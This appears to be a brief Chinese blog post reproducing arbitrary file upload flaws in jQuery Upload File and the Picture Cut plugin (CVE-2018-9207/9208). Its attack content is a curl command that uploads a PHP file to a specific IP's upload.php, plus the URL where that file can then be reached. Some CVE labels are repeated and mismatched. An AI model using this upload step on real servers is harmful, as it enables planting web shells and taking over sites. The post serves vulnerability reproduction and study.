【漏洞复现】 jquery 文件上传 (CVE-2018-9207|CVE-2018-9208)

1.php

(CVE-2018-9208)

jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。

jQuery Upload File <= 4.0.2 中的任意文件上传

 curl -F "[email protected]" "http://123.58.224.8:41698/jquery-upload-file/php/upload.php"
http://123.58.224.8:41698/jquery-upload-file/php/uploads/1.php

(CVE-2018-9208)

picture cut是一个jquery插件,以非常友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能

你可能感兴趣的:(秀秀,linux)